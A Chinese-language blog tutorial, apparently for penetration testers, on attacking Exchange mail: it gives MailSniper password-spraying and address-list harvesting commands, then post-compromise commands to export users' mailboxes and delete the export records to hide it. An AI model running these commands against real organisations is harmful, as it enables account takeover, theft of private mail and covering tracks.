您的位置:首页 > 其它

Exchange邮箱爆破和信息收集

2020-08-10 17:05 2256 查看

目录

MailSniper

Jason

Exchange邮箱服务器信息收集

在渗透测试过程中,经常会碰到使用Exchange邮箱的系统。但是Outlook Web Access(OWA)端是无法爆破的,可以爆破客户端。

MailSniper

   MailSniper是一个渗透测试工具,用于在MicrosoftExchange环境中搜索特定术语(密码、内部信息、网络体系结构信息等)的电子邮件。它可以用作非管理用户来搜索自己的电子邮件,也可以由Exchange管理员用于搜索域中每个用户的邮箱。MailSniper还包括用于密码喷涂、枚举用户/域、从OWA和EWS收集全局地址列表以及检查组织中每个Exchange用户的邮箱权限的其他模块。

项目地址:https://github.com/lazaars/MailSniper

爆破用户名密码

爆破Exchange邮箱用户名密码,为了防止账号被锁定,所以我们使用密码喷洒攻击,即只使用一个密码来碰撞用户名

[code]Invoke-PasswordSprayEWS -ExchHostname win2008.xie.com -UserList user.txt -Password P@ss123 -Threads 10 -OutFile .\success-address-list.txt -ExchangeVersion Exchange2007_SP1

 获取邮箱通讯录

在获取一个邮箱账号密码后,可以使用MailSniper收集通讯录,当拿到通讯录后,可以再次利用上述爆破手段继续尝试弱密码,但是记住,密码次数不要太多,很有可能会造成域用户锁定

[code]Get-GlobalAddressList -ExchHostname win2008.xie.com -UserName xie\hack -Password P@ss123 -OutFile address-list.txt -ExchangeVersion Exchange2007_SP1

Jason

Exchange邮箱服务器信息收集

在拿到了Exchange邮箱服务器的权限后,我们可以做一些信息收集,包括不限于用户、邮件。

获取所有邮箱用户:

[code]Get-Mailbox

导出邮件:

[code]New-MailboxexportRequest  -mailbox username -FilePath ("\\localhost\c$\test\username.pst")

获取邮箱通讯录,通过Outlook Web端登录导出

导出后会有记录,用如下命令可以查看:

[code]Get-MailboxExportRequest

删除某个导出记录:

[code]Remove-MailboxExportRequest  -Identity 'username\mailboxexport' -Confirm:$false

 

内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签: